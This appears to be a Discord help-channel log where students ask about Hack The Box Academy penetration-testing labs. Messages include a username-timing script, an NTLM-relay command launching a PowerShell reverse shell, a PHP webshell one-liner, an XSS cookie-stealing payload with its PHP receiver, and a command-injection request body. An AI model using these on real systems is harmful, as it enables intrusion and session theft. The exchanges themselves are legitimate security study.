#modules
Not jail breaking I just got apps on it and have trouble opening them
I ain’t asking u
@fathom pendant lol u wanna have a look at it - its not bad i guess
Well if they're blocked you'll need to jailbreak to bypass features
No
Anyway I suggest you stop asking @stark edge
I’m going to ask again does anyone know how to open apps on Mac computer
<@&861185840277487616>
@stark edge No one will assist you in getting around your school security. As Marcie said, no one will assist. We are not that kind of server.
we don't help ppl bypass security measures put in by your organisation.
Please don't make me kick and ban you from the server.
Ok well on my personal mac I’m trying to open Microsoft edge and when I tap on it nothing pops up it just hides away
Sure, now its personal
lodge a ticket with microsoft help
Okay, well it doesn't deal with HTB Academy modules, so still irrelevant
But anyway take it up with your school staff/it
the audacity this guy has
But it’s my personal computer
Either way, irrelevant to this chat
i can assure you that no one cares. we're not an IT help desk.
General doesn’t work for me
google it
@stark edge Please stop. You've been asked several times.
I got another question though Fr Fr I have a vpn on chrome and it doesn’t seem to be working
Ive been looking through the help/man command for npm install and I see nothing related to web servers
all I understand is that its a package manager and I should be using the same structure as the previous commands ive used to create web servers( xyz install ...)
@surreal rain mind giving me a hint if you're free?
linux fundamentals module - working with web services
wait
When I learn from modules, am I supposed to be searching this stuff up
I assumed all the information I'd need would either be in the -help command or a hint I would have to glean from previous modules
I wouldve had this module over with 4 hours ago
Sometimes you need to utilize uncle Google
^
If it's not found in --help or man pages, google
plus a lot of the time you'll be on google so it's a good habit to use google for questions
Alright, thank you both
Hello, I am currently subscribed to student plan. If I subscribe to the Platinum plan, can I switch back to the student plan before my platinum plan ends?
yes as long as you're still using the same verified account
Thanks
As long as a subscription is active, you cannot take out another subscription
As soon as the subscription has expired, you can change your subscription
Thank you very much
Hi, team!
Are there any issues with this lab? The machines cannot be spawned 😦
It took forever...
if you are having spawn issues, try switching VPN regions or contacting support
Might be VPN issue? Ok, I'll try to change the region. Thank you!
I have enumerated MSSQL server and DC01 server, but I am not able to get a foothold on either of the machines. Can anyone give me a little nudge on the direction that I should be looking at?
Go through each of the sections methodically to move forward
I have managed to get a list of domain users, but they are a lot! Should I do password spraying against all of them? Or just the few ones whose naming looks different than the norm?
Got it!
When in doubt go through slowly
Can you elaborate a little more on what you mean by "go through slowly"?
try the techniques you have learned
MODULE : Whitebox Attacks
SECTION: Data Exfiltration via Response Time
My poc.py is working fine on my local machine but doesn’t work on the challenge instance, i tried many variations of the THRESHOLD_S and still can’t identify a user on the remote system:
||import requests

url = "http://94.237.59.193:35162/filecheck"
wordlist= "xato-net-10-million-usernames-dup.txt"
THRESHOLD_S = 1
cookies = {"session":"eyJsb2dnZWRfaW4iOnRydWUsInVzZXIiOiJodGItc3RkbnQifQ.Zp9Hgw.9-9S6E4lOWyadoaB5GXYbvJ2AWM"}
proxy = {'http':'http://127.0.0.1:8080','https':'http://127.0.0.1:8080'}

with open(wordlist, 'r') as file:
    for usernames in file:
        usernames = usernames.strip()
        res = requests.get(url,params={"filepath":f"/home/{usernames}/"},cookies=cookies)
        if res.elapsed.total_seconds() > THRESHOLD_S:
            print(f"valid username in the file system is: {usernames}")||
Edit: the author of the module replied and the challenge should be updated.
Thanks @upper haven
I had the same issue, the timing was a pain, took a few attempts. It helped me to do this via a pwnbox
Hey, am on the Skills Assignment - Pivoting, Tunneling, and Port Forwarding. Am having trouble getting the lsass file from the Windows internal machine to transfer over to my kali thru an Ubuntu pivot.
Ive tried scp, smbserver, and thru rdp gui - all of them dont work 😦
I need some help with Linux Privesc - Logrotate (https://academy.hackthebox.com/module/51/section/1589)
I have compiled the exploit and run the exploit with the payload (and nc waiting for the revshell) but the log isn't rotating. The module tells you to use /tmp/tmp.log but even after 15mins the logs haven't rotated (therefore the callback hasn't started).
any help on why my exploit isn't working would be great as i've definitely followed the instructions.
I just tested it and I agree, the response timing is too sensitive. I'm gonna adjust the lab and push an update
Suggestion, just transfer to Ubuntu, then your machine. If you are using xfreerdp there's also the /drive: option
thats amazing
ive tried the /drive option but it doesnt work - it's stuck at 0% for a long time
have you altered the log? to trigger the rotation
Use tcp vpn
i am using tcp vpn
so i managed to find the right log, and then sometimes can trigger a logrotate, but twice now the revshell has connected but dropped before i can even put in a command
vautia is amazing 🙂
He really listens to all feedback and tries to implement it.
Anyone else having any issues spawning machines? I know there was just a critical outage a few minutes ago, says its resolved now
and sometimes the exploit will run, but will quit halfway through
I will retry this section on my vm when the update is pushed 👀
you have a short window to do it, suggestion is to try another way instead of rev shell
either suid binary or add the user to sudo group
Something went wrong
Error Code: 504
Our engineers have been notified and are working to resolve the issue.
Ray ID: ::RAY_ID::
it's back, refresh the page
👍
got the flag in the few seconds i had with a shell haha. but now the page on academy won't accept it and is taking a while to load..
i did ping my VM from the attacked host and got 300ms and it was stable. so its a weird issue to have...
it was down for a min but should be back now
Website still not working or spawning machines. Error 504 still
Website and spawning machines.
It is working here, but kinda slow
it finally accepted the flag. and i guess the current issues made the shell a bit hit and miss .... lol
I just came across ja3 in the Working With IDS/IPS module and am trying to install it on my kali machine to play around with it some more.
It does not appear to be available through apt so I tried grabbing the go version from https://github.com/dreadl0ck/ja3. I grabbed it with wget in terminal and am unsure where to go from there. Do I need to do something with go to make it an executable and then add it to $PATH?
The machine we ssh into in the module has it added to path.
I was also a bit confused by the space that appears to be at the end of the ja3 folder from the wget https://github.com/dreadl0ck/ja3. The same space exists after ja3 on the machine we ssh into.
is there any issue at this moment with the HTB academy main page?
Yes, it's down
Is there any info on when the platform will be back up?
thanks, had missed that one
No worries 🙂
I hope it gets fixed soon too
is it related to #710108839063846964 message as well?
I am not sure, but most likely that will be connected
alright, thanks for your time 😉
academy seems to be back up for me
@tardy jungle @storm elk The lab is updated now 🙂 For reference: For me it took about 5 mins to find the solution, producing 5-10 false positives in the process. It's still not ideal but timing attacks are inherently prone to false positives. For the purpose of the section it should be fine now, it's significantly more reliable. Please try again @tardy jungle and let me know if you face any issues. Make sure to figure out a correct value for the threshold using the known user htb-stdnt. I don't know how this one slipped past me when creating the module. Sorry for any frustration this has caused.
okay Academy is hating me again
its down for me too....
ig its down
I can't spawn to the target system, is it a general issue?
may I dm you regarding this? 🙂 I tried a higher timing, and the solution doesn't show the correct username 😅 pwnbox in DE location
Are you still facing this?
Cloudflare seems to be checking my connection a lot 👀
did you finally do it? if not, can you share more details? (link)
Hello, can anyone help me explain something to me, from Firewall and IDS/IPS Evasion - Hard Lab.
I am currently doing Information Gathering Web Edition in Fingerprinting. I have to find the OS for vhosts provided an IP. to check the IP i pinged it but it was down, i checked the traceroute and it seems I am hitting the gateway 10.10.16.1, but after that I can't hit the server, I also put the domain with IP in /etc/hosts, but as I can't reach the server it is not giving me any benefits. Am I missing something? I would be glad for any hint/help
why? 
it thinks I am a bot
same for me, google thinks that. BUT Sir I'm a real Human. 
you're not alone, we're all bots
Is the provided IP a public ip?
Ip:port?
has anyone had issue with brute forcing ssh in easy lab of password attacks? i thought the logins are usually early on in the lists but hydra has been going for 45 mins now 😛
Guys if you have issues the last hour, spawning targets in academy and if you are getting some 403 in network tab of devtools, then refresh the page and check again. It's a **temporary** issue cause of cloudflare high level of bot validation. It will stop asap when network is stable
Hey guys, module Web attacks, bypassing basic authentication.... i have found few methods which dont get blocked but, i get a blank page after i use it, anyone encounter this? am i missing something
Hi guys. it might be just me but I am finding a small part of the Attacking SMB section a little confusing
`We can create a PowerShell reverse shell using https://www.revshells.com/, set our machine IP address, port, and the option Powershell #3 (Base64).
Attacking SMB
maqbull@htb[/htb]$ impacket-ntlmrelayx --no-http-server -smb2support -t 192.168.220.146 -c 'powershell -e <HASH>
Once the victim authenticates to our server, we poison the response and make it execute our command to obtain a reverse shell.`
Specifically the above. when it says we poison the response. Doesn't this mean we are relaying the user's hash to the target server the user is trying to authenticate to ? In this case the target specified by -t is the server the user wants to auth to. But we hijack the creds and complete the authentication to the server, additionally getting the server to run a revshell for us?
so it's not really a response to the user
also the ip address in this example is different from the target in the previous example: which was:
impacket-ntlmrelayx --no-http-server -smb2support -t 10.10.110.146
oh god a wall of text
ntlmv2 uses a challenge and response mechanism, so there will be multiple exchanges before it's properly authenticated
Hello, I have a problem in the Windows Lateral Movement module in the WSUS Section Lab. Can anyone help me? Thank you
what's the problem?
my bad i edited
When I try to run SharpWSUS.exe I got error
run as admin
I did it
fair. but... the reverse shell is still as a result of the relaying of the creds we capture from the user to the target server. And not as a result of us poisoning a response to the user. or i am missing something
are you running it on the right host? if yes then reset the target and try again
responder is doing the poisoning
I am running it from SRV01
ok I got it thanks
Hey! I got stuck at the web proxies module at running tools through proxies because I can't set a proxy in msfconsole
These are my settings
Proxies HTTP:127.0.0.1:8080
RHOSTS IP
RPORT PORT
And in zap I have local proxy on 127.0.0.1:8080
OK. i think my contention is that the sentence seems to imply that the rev shell is as a result of a poisoned response to the user. However in fact the reverse shell is a result of relaying the hash to a target server and executing the rev shell there. Or am i misunderstanding
Any idea?
you won't receive a ntlm auth to relay if you don't poison
so it's the result of both poisoning and relaying
ok thank u
and by poisoning we mean that we respond to a request for a share or resource that does not exist
i.e. we do the challenge response bit
responder does LLMNR, NBT-NS and MDNS poisoning
effectively this is a Mitm
yes
ok... but what do we mean by "poisoning"
aren't we just completing the challenge/response with the user as normal
then replaying that to the target
poison the request so that an authentication will be sent to a host that you control in the first place
How long does it take to download the patch on dc01?
you're misunderstanding challenge/response part, it's done between the poisoned host and the target, your host does neither challenge or response, it just relays the requests
ah yes of course
I waited for 10+ mins
that's passive
ok, thanks
why would you want to use msf through zap?
so we can poison the request from the initial user? to make it so the user is requesting a non-existent resource to which we can respond to and then forward to the target server
ok, apparently I had to open the built in browser to fix it, I have no idea why, any ideas? Thanks :)
Because it's a requirement in the course
because i thought we have to rely on the user requesting a nonexistent resource for us to be able to respond
respond to the multicast query from the victim
no, you just need to relay the ntlm authentication request
there's also a ntlm relay module that goes into details
right.... so we don't "poison" any response. we just respond from our illegitimate smb server for a nonexistent resource the user is requesting. Taking advantage of the fact that user is not authenticating servers that respond
thanks for ure patience
i believe i get it
i just find the wording a bit confusing
the point of poisoning is so that you have a ntlm auth to relay with, hosts won't just request auth to any IPs, so it will either have to be poisoned, coerced or if you have controlled a known smb server in the network and relayed from that host
It's just that when we talk about an arp cache poisoning for a MITM. We actually have to take some poisoning action such as flooding or being quicker with our arp response in order to poison the user's cache.
i don't get how we poison the victim machine to allow us to respond
i understood that we wait for a user to request something that doesn't exist and hence we have the opportunity to respond where other servers won't
but i think we beat it to death already. it's clear i need to read more on how the ntlmrelay is doing poisoning
thank u
it seems to be online here
what error are you getting?
keeps reloading from the morning
try clearing your cookies, that might help
can I have some cookies
oh wait this isn't gen chat
Anyone able to help?
Have you clicked Using System.Windows.Data; (from PresentationFramework) ?
yup, clicked it but nothing changed
and you're sure you selected the right project type when creating it?
yup, C# console app
try console app (.net framework)
nevermind, this was the issue i chose the one without the (.net framework)
thanks
glad I could help 😄
Hello, everyone!
I am on https://academy.hackthebox.com/module/54/section/490 right now and I have a problem with reaching http://admin.academy.htb:PORT and http://admin.academy.htb:PORT/admin/admin.php
In the module don't have to access it, but ffuf results has only the errors. I assume that these problems are connected.
Can anyone help me?
What error are you having?
Have you added the IP address to your hosts file?
there is no error in response
could someone assist "Intermediate Network Traffic Analysis" -> funky_dns.pcap?
yes
The modules before this one, I have no issues to reach need hosts...
well looks like you didn't add that vhost to your hosts file
Maybe the IP has changed in the new section?
exactly my thoughts
I just tried it, works fine here
I've tried yesterday and today I've spawned a new one, remove olds from hosts and add the new one.
Double check that there is no typo or that you have accidentally switched up the host and ip
Mmm... How should it look in the hosts file?
that seems to be the issue, the vhost is admin.academy.htb
oh... Thanks, guys. Will try asap 🙂
good luck
It works. I re-read quickly the prev pages and there was an attention to add admin.academy.htb to hosts, but I've skipped it somehow.
Thanks for help once more 🙂
glad you got it working!
Good morning; I've recently been working through the SQL Injection Fundamentals and SQLMap Essentials modules. In both modules, after successfully running through the first examples that require exploiting the DB, all subsequent attempts fail, saying the DB isn't responding, the connection is reset, etc... I've tried resetting the target box, coming back another day, but to no avail. I'm running this from my personal Kali VM. Any clues?
Have you connected via the vpn?
I have, yes
can you show the error you get?
I'm unable to upload an image in this channel, maybe I missed something along the way?
You need to get verified. See #welcome for instructions, but feel free to send it to me in DM 🙂
ha, I'll do that...DM'ing you real quick
In Introduction to Windows Command Line Module,User and Group Management. The exercise is to get the specific domain user surname So i tried to use Get-ADUser but its showing "server has rejected the client credential". Any help please?
doesn't seem like you're using the right user for that query
ohh, sorry. i logged into the htb-student account instead of the target account.
https://i.imgur.com/a4CMo95.jpeg
I don't get it.
Why can't tcpdump read it?
https://i.imgur.com/tbvgojY.jpeg
Besides, it looks like Pwnbox in the free plan still can't download the file.
To be able to post pictures, your user must be verified. Read and follow #welcome
its obvious, look at the error and specify the correct path.
you're in your home folder, change to Desktop and try again
I need help on the Introduction to Digital Forensics, Skills assessment the last two questions. Any guide will be highly appreciated.
no its private and I don't really know how to access it. I always thought connecting to HTB vpn would connect me to their private servers like used here but it isn't case. And there is no port given
tks
anyone else felt like the sqlmap module was a bit rushed on the protection bypass section ? like when it came to bypassing protections, they did not really explain much. Are we just supposed to progressively throw protection bypasses until one sticks ? Like I understood their use, but the module does not seem to explain how to enumerate if an application is vulnerable to an sqlmap bypass.
And even the assessments at the end of the section basically told you when to use each bypass. "use this bypass because this app is old", you did not actually have to figure out if the app was vulnerable to such bypass.
How can I get access to url of phishing xxs section task that will take credentials from victim
Hi, I am working on Linux Privilege Escalation Skills Assessment. I am at the Flag5 and stuck for a few days. I got the reverse shell and did the exploit from GTFOBins but it did not give me the root shell. I also tried to upgrade the shell but did not help. Can someone give me guidance on how to tackle this last flag please? (https://academy.hackthebox.com/module/51/section/480)
Cross site scripting
What have you tried/where are you stuck?
Can anyone help me to get back my Instagram account
We can not help you with this. Contact instagram support
Module: Web Proxies
Section: Repeating Requests (https://academy.hackthebox.com/module/110/section/1051)
In the HTTP request, the ls -a command is being injected. Can someone please tell me why the value of ip is set to ls+-a and not ls -a?
- for space
What encoding is that? If that's even the right term, please correct me if it isn't.
url encoding
Wasn't %20 or something "space" in URL encoding? Am I mixing something up?
Url encoding indeed
By popular convention, spaces (which are not allowed within URLs) are often represented using the plus '+' character as well.
They mentioned it, I just failed to have the patience and read on, my bad. @storm elk Thank you too!
I was not aware that + could be used to encode a space as well, always thought it was just %20. Good to know.
Why ptunnel-ng don't work in an attacking machine?
include the module and section as mentioned before
Module: Password Attacks
Section: Hard Lab (https://enterprise.hackthebox.com/academy-lab/8728/6841/modules/147/1356)
Just really need a sanity check that this isn't the password for the encrypted hard drive on the hard lab for password attacks. Using the mutated password list, it came up with a password but it didn't work.
Password: || 123456789! ||
It is indeed
find a tool to access the drive 😄
hey guys, very quick general question. When I establish an ssh connection to a module on HTB, is it usually a slow connection? For example, a lot of my character inputs are highly delayed which makes it difficult to navigate.
I used another one (dm if you want further hints :D, dont wanna spoil too much over here)
you can try switching VPNs and see if your latency changes
Hey, I'm doing the IPS/IDS hard lab from the Network enumeration with nmap module, and I'm having some issues, I want to ask how much time is too much time waiting for a scan (I want to try slower scans so I can maybe get an answer from a port I don't know), I have tried a -t2 scan on top 1000 ports to test and it took 10 mins is that ok?
if not, message support
I mean Im using my own VM using the ovpn file. Is that what you mean?
yes, you can switch regions for your VPN connection
there is an option to do so near the bottom of the section you are working on
ok ill try
Evening, looking for a step for a hint with the Windows lateral movement module, stuck on the skills assessment trying to pivot off the first box.
delete the already built binary in ptunnel-ng/src then cd to ptunnel-ng/, run
sudo ./configure LDFLAGS=-static
sudo make
and copy the new binary over, it should have the size of 5083KB
have you gotten the first question?
Yes. I have creds for two users, and I've enumerated the internal network (I think). Stuck on the second, and I've tried a variety of methods to pivot with the second user's creds with no success.
check the hint and use nmap
I can see there's an IPv6 address for one of the servers, and there's service(s) available on IPv6 that aren't on IPv4, but the service(s) aren't liking the second user's creds.
thank you very much for your help. I just feel like the course is a little outdated. programs work Crooked or need to find another way.
Tried Nmap to enumerate the IPv6 address via ProxyChains with no joy... it's currently hanging as I type this. I've tried a couple of other network scanners on the first box and PS Test-NetConnection also
how do I fix "no route to host" connection issue when connecting with ssh? Module - linux fundamentals Section - Find File and Directories
proxychains nmap -6 -sT -Pn || [dead:beef:df::3]|| is the Nmap command that's hanging
make sure you're using socks5, socks4 does not support ipv6
could anyone help me? 🙂
yup using SOCKS5. However, it sounds like I'm not being totally daft and on the right track and it's the server the IPv6 address belongs to that I need to pivot onto. I'll try and persevere getting Nmap working meantime, thank you.
you can also add the ip to your hosts file and use the hostname instead
Sure 🙂
On windows priv esc module, the windows server and skills assessment 1 targets have been down for a few days
So been asking in pro-labs about Dante, would be sweet to get some assistance.
Be patient 🙂
Hello there
in updated information gathering web edition skill assessment, when I use ffuf to enumerate vhosts against inlanefreight.htb domain, how is every subdomain in wordlists giving me status of 200?
hello, what should be added to the command to check all passwords against a single username and then moving on to the next username?
share which part and screenshot
there's an option for that, check netexec smb -h
cant seem to find it. I looked it up.
I think you should filter by size 120. idk which part is this
can i get help : What is the full subdomain that is prefixed with "web"?
Which module and section?
yeah i also checked, looks like there isn't an option. i was probably thinking of hydra which has the option to loop over usernames
INFORMATION GATHERING - WEB EDITION in Virtual Hosts
oh ok, thanks. looks like I got it confused as well then.
what is the option in hydra?
add ip and domain in /etc/hosts
and try to fuzz it with gobuster or ffuf
gobuster with a pattern worked for me
even if I filter it i can't understand how every subdomain is giving status 200. and after filtering it with 120 there is nothing left
oof.
bro share the module link like which part is it
if someone already finished this module, please help!!
This should help you out
please keep messages relevant to HTB Academy module content
https://www.freedesktop.org/software/systemd/man/latest/busctl.html
https://www.freedesktop.org/wiki/Software/dbus/
Read the above, run the command by itself and with flags, and see what it does. You can break out of it by following GTFO.
It may look weird once you get a shell, but keep going with it
Is there a way to speak to an administrator?
What is it about? I'm not an admin.
about me waiting 24 hours for some help?
there, here in the prolabs section as well. Hell I tried getting a ticket last week for support chat have nothing in my email
hey, how can i help you?
They seem to have raised a ticket on the platform. I'll take care of it.
Can you please DM me the email address?
alright, cool
@south bison
Use a different list
Read and follow #welcome
is that acc identifier thing not some secret key with which someone can access my account?
No, that token is only for Discord
This role is used to alert the moderators
damn i got a cool thingy in front of my name, can ya'll see it
payload bunny excuse me
You can now access other channels 👍
Use proxychains maybe
session closed or timed out
3rd screenshot
Looks like it's having issues staying connected
Failed to connect
I'm looking at your ptunnel logs brother
I use VM parrot os. Maybe need to use pwnbox?
Not required
Try changing vpn to tcp and connecting again
I honestly haven't used ptunnel, too much headache
Hey could anyone help me with proxychains and zap, it seems like it doesn't work
I have a noob question there is a private server I have to access, I am connected to HTB VPN 10.10.16.X, I can access the gateway of the server, but how will I access a server which is in 10.X.X.X
And the last exercise is to route connection through zap with msfconsole, but setting proxies to 127 0 0 1 8080 doesn't work
I spend days-weeks on installation-setting programs.
so like I want to jump from my given subnet to the subnet where server is located right? how?
Routing table sets it up
There is no subnet hopping
¯_(ツ)_/¯
Traffic through zap?
Huh?
At least in this context
Like, capture the request
thats the thing after my packets hit the gateway it dies so the gateway doesn't have it route table set correctly?
ok, nvm I said the stupidest thing ever
Message support
So, the module requires me to send the payload from msfconsole through ZAP and see the request (to provide an answer)
But it doesn't work
You are using the 'auxiliary/scanner/http/coldfusion_locale_traversal' tool within Metasploit, but it is not working properly for you. You decide to capture the request sent by Metasploit so you can manually verify it and repeat it. Once you capture the request, what is the 'XXXXX' directory being called in '/XXXXX/administrator/..'?
Did you set the proxies option?
Yes, let me run it again and I'll send you the result
Btw you're just meant to hit a random website, I chose Google
Hey, I'm doing the IPS/IDS hard lab from the Network enumeration with nmap module, and I'm having some issues, I want to ask how much time is too much time waiting for a scan (I want to try slower scans so I can maybe get an answer from a port I don't know), I have tried a -t2 scan on top 1000 ports to test and it took 10 mins is that ok?
No
Also you don't need to do -t2
ok, I think it didn't work because I set rhosts as the target website from the section
Okok perfect
Ye
sup everyone, can anyone tell me how to get the new content of the server side attacks? i own the module but how can i reset it to get the new one?
You cannot reset the module. However, you can read the text in the module and apply what you have learned in the lab.
Oh thanks dude
Do ssh passwords accept whitespaces within?
Yes
If you're trying to pass the pw in the command line, instead of when it asks, you need to wrap it in quotes
thx
Hi
Yo I feel so dumb today
Hello
Just finished studying. How’s your day going?
You got this man 😌
All good. It’s 10pm so my day is over soon
I try to do AEN blind and I feel so dumb
Oh dang, it almost about time to sleep lol
I have to read the modules and realized I'm making so many mistakes
It won’t allow me to
I have gone through the files(json) in the target machine searched for any doc file but found none. I also downloaded the ones from VELOCIRAPTOR and searched them one by one for any sign of the doc file. For the second last question, I have tried some paths that I found but nothing is working so far
Follow the instructions in the #welcome channel
It keeps redirecting me here
Hello
I am new here. I have joined to the discord channel to solve a technical issues with modules. Does the channel have a tech. support or smt like this?
If it’s question about how to do something, this is the right place to ask 🙂
To determine how to do something, first, I need determine how to connect to the target machine. I cannot connect via rdp from my kali (remmina, xfreerdp) and via HTB Viewer in brows. In addition, nmap shows that rdp port is filtered. So how should I connect? 🧐
Reset the target if you're meant to rdp to it
Hi guys, just started HTBA.. so excited to learn everything!
I have a question: Can I personalize the workstations generated on the site?
No
You can download and run your own vm though; the workstation (pwnbox) is based off ParrotOS
Oh my bad
I have reconfigured vpn and it has worked
From your guys exp, it's better using pwnboxes or setup my own?
File uploads skills assessment done, that was rough!
Your own, file retention and customizability are big plusses
so, Kali linux is the one you guys use?
Parrot is what the in browser workstation is
Not understanding the skill assessment part of the new server-side attack? Is this intentional way of getting the answer? was very anti-climatic...
I'm working in Zone Transfers in the Information Gathering - Web edition module, and it's asking me to run a 'dig axfr' but every time I run it I get timed out, servers could not be reached, or network unreachable errors. Could anyone help?
Despite being able to create a http server in my vm, npx http-server /home -p Does not qualify as an answer..?
@primal silo check that the @ sign is correct via rdp, i suggest using onscreen keyboard
oh okay
not working
pls help sm1
this is not working i think smthing wrong at the servers end i have reset it many times
Module: File Transfers section: Windows File Transfers, Q2
What are you using for RDP?
windows default rdp client
i can connect to the server but the credentials are not working
Can't help with that I'm afraid, I used xfreerdp on a kali vm with those creds and it worked fine.
okay then
let me try with xfreerdp
well it worked with xfreerdp, i don't understand why it didn't work in windows rdp client
but whatever.. thanks
I had the same issue before and it would only connect with creds from terminal, wouldn't work when trying to put them in on the windows login. No idea why, You could try doing something like ACADEMY-MISC-MS02\htb-student and see if that works or some variation
dig axfr domain @ip
I am having an issue that I wanted to see if anyone else had and was able to fix. In the 'Upload Exploitation' section of 'File Upload Attacks' module one of the first things you are instructed to do is upload phpbash webshell into the provided web application (similar to the previous section). I am able to upload the smaller size files like the one line '<?php system($_REQUEST['cmd']); ?>' and successfully navigate to the location and use it as a shell. When I try (in my Kali VM or Windows main host) to upload the larger phpbash file it just hangs. Weirdest thing is if I use the pwnbox I have no such issue. Anyone have any idea why this might be happening, as I prefer to use my own VM if possible and it looks like I am going to need to be able to upload the larger files a few more times in the module?
It should be $_GET not $_REQUEST
Try changing mtu size to a bit lower and see if that fixes
Funny I didn't notice it but that is verbatim what they have in this section but I used one from previous section that used GET. This one hasn't given me any issues.
Ok let me give this a try thank you!
is Exploiting Web Vulnerabilities in Thick-Client Applications in scope for the CPTS?
No luck.
Another wrinkle, I just uploaded the phpbash.php to the web application via pwnbox and then was able to navigate to it no problem in my VM so there is an issue somewhere blocking the larger file uploads. The question is where and why?
anything taught in the course content should be considered in-scope for the exam
I am not sure why but going around my safe DNS using VPN fixes the issue. Maybe it is something else about using my VPN that fixed it but I can't think of what else that would change. Oh well. Problem solved. Thank you @fathom pendant for your suggestion!
CROSS-SITE SCRIPTING (XSS) Module
Section: XSS Discovery
Question: Utilize some of the techniques mentioned in this section to identify the vulnerable input parameter found in the above server.
Firstly, why can't I test multiple parameters on xsstrike?
python3 xsstrike.py -u http://83.136.254.167:32540/?fullname=a%26username=a%26password=a%26email=aa%40aa.aa
Secondly, I have used all payloads for XSS that are available through XSStrike but I don't get a hit on the vulnerable email parameter.
python3 xsstrike.py -u http://83.136.254.167:32540/?email=aa%40aa.aa -f /usr/share/seclists/Discovery/Web-Content/xss
Is there something wrong with my command? Any info would be appreciated
dont use that bs in my opinion
do the xss manually :) especially if ur just learning
The point of this section is to use the automation tool that is demonstrated. I already did it manually successfully on the email parameter
Looks like you didn't follow the instructions, my command is different and works
Can I DM u?
ok
Do you all connect to a VPN before connecting to HTB VPN?
no
I should say, should we?
it's just going to add latency, i would only do it if you have stability issues
Oh alright
Hi, when working through the modules in cpts, I am unable to access the cheatsheet which is provided at the beginning of each module, can anyone help me about that?
I got it. I am able to access it from another browser.
It does test and check each param
Thanks I forgot to put quotes over the URL
Regarding https://academy.hackthebox.com/module/77/section/843
I managed to run the exploit in the pwnbox but couldn't do it with my own PC (Latest parrot OS) with exactly the same parameters, is there any reason for that (such as IP filtering etc)?
did you get any error? double. checkd the port?
I just checked on my vm and it seems to work, so just making sure you set the port right 🙂
I literally copy pasted the line I used to be sure for the exploit, rhosts, rport and just ran. I searched a bit and some users mentioned that they ran into the same issue. I also had the VPN set if that matters in any way. Thank you for checking on your side though 🙂
This exercise is with a public IP, so I didn't connect to the vpn 🤔
have you tried respawning the target?
I tried that first actually. Then I ran the xploit on my PC -> not working; moved to the pwnbox to check -> working; Tried again on my pc to be sure -> not working
Would it have anything to do with the msfconsole version used or script version itself?
I tried that too using 'sudo' as it was one of the thing I found online too
it works fine on your own box, so you probably missed something or didn't set it up right
the most common issue i see with that is picking the wrong exploit
Here is a screenshot with the IP at the bottom and what I set. I also used the "show solution" explanations just to be sure
That actually looks correct to me
i didn't make notes for that module, but i thought it was one of the eternalblue exploits you had to use. i don't think you're using the right exploit.
i could be wrong though
It’s the correct one, I just checked
Note to add:
- I tried msfconsole from zsh with and without sudo
- I also tried from bash (thinking that zsh would get in the way) with and without sudo and obtain the exact same result
Yeah. But when you spawn the target and visit the webpage it tells you which module it used
ya i know. the hint shows its not eb
Is the same version of msfconsole present in the pwnbox and Parrot 6.1? At least the Major?
What happens if you proxy it through burp? What’s the response of the server?
I’m not sure about that
Burpsuit CE?
Yes
I have just started Burp CE with proxy through the integrated chromium and do have access to the website without any issue
You can set msfconsole to send it through burp
set PROXIES HTTP:127.0.0.1:8080
Then run your exploit again and you should see some input in burp
I run it once like this. Then I set "intercept response from this request" for the second time and did not receive anything
Try to disable intercept, then it will just do its thing
And you can view the request and response in the HTTP history tab
That’s odd indeed. Might be worth asking support for help
You can contact them via the green box on Academy
https://academy.hackthebox.com/achievement/1346583/51
That took way longer than I wanted .... lol
Privilege escalation is a crucial phase during any security assessment. During this phase, we attempt to gain access to additional users, hosts, and resources to move closer to the assessment's overall goal. There are many ways to escalate privileges. This module aims to cover the most common methods emphasizing real-world misconfigurations and ...
Ok will do. Thank you very much for time and support! Really appreciated it!
You’re welcome. I’m sorry I couldn’t be of any more assistance
It's ok, you were very kind and did your best. I have just contacted the support and gave them a link to our chat. Thank you again for your time!
CROSS-SITE SCRIPTING (XSS) Module
Section: Session Hijacking
Try to repeat what you learned in this section to identify the vulnerable input field and find a working XSS payload, and then use the 'Session Hijacking' scripts to grab the Admin's cookie and use it in 'login.php' to get the flag.
My command which works and a request is sent to my server:
"><script src=http://10.10.15.114:80/index3.php></script><script>$.getScript("http://10.10.15.114:80/index3.php")</script>
This is the php script for index3.php:
if (isset($_GET['c'])) {
$list = explode(";", $_GET['c']);
foreach ($list as $key => $value) {
$cookie = urldecode($value);
$file = fopen("cookies.txt", "a+");
fputs($file, "10.149.248.249: {$_SERVER['REMOTE_ADDR']} | Cookie: {$cookie}\n");
fclose($file);
}
}
?>
I get a request message alert but the index3.php is not getting the cookie. Is there anything I'm doing wrong? Thanks
Spoilers dude
hy im getting this error in Using web proxies - Proxying tools
$ proxychains curl http://127.0.0.1:8080
[proxychains] config file found: /etc/proxychains.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
error: invalid item in proxylist section: https 127.0.0.1 8080
I have also edited /etc/proxychains.conf
You'll need to comment out the other proxychains options
Also http vs https type deal
invalid item https
Don't add https line
ok
[proxychains] Strict chain ... 127.0.0.1:8080 ... timeout
curl: (7) Failed to connect to 127.0.0.1 port 8080 after 0 ms: Couldn't connect to server
now what to do
Hi everyone
any hint for this
am stuck on web attacks module
section Bypassing Security Filters
Okay so what exactly do you expect from us? It mentions in this section what to do, with the filename given in the question
guys please help me
are you running the tool that you're supposed to proxy with? ie. burp?
bruh the proxychain curl isnt working im getting error
From where to where are you proxying the traffic
Hello academians :D. I need some minor guidance regarding the last challenge of the File Inclusion module.
I have identified two entry points in the application to find a potential path traversal. I have been fuzzing these parameters with the Jhaddix path traversal list but I can't seem to find one that can work. For me there are two reasons that this might happen:
- or I haven't found all entry points in the application. But I doubt it because I have fuzzed all parts of the URL and couldn't find other entries
- or the Jhaddix list does not have a path traversal that can work..
Any hint is welcome.
POST /index.php HTTP/1.1
Host: 94.237.55.105:33586
User-Agent:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: http://94.237.55.105:33586/index.php
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 27
file=test%3Bcp+/flag.txt+./
Feel free to dm me to prevent spoilers
url encode it and you should be fine
ok
Just enter this filename in the browser via the get request, and then verb tamper
then check the files again
bro im just a beginner . im totally confused . Using web proxies - Proxying tools .
Try running 'auxiliary/scanner/http/http_put' in Metasploit on any website, while routing the traffic through Burp. Once you view the requests sent, what is the last line in the request?
this is the question . I have to use msfconsole . I just tried proxychain .
proxychains curl http://SERVER_IP:PORT
this server_ip: port should be replaced by the ip of web sites ?
even nmap proxy isnt working
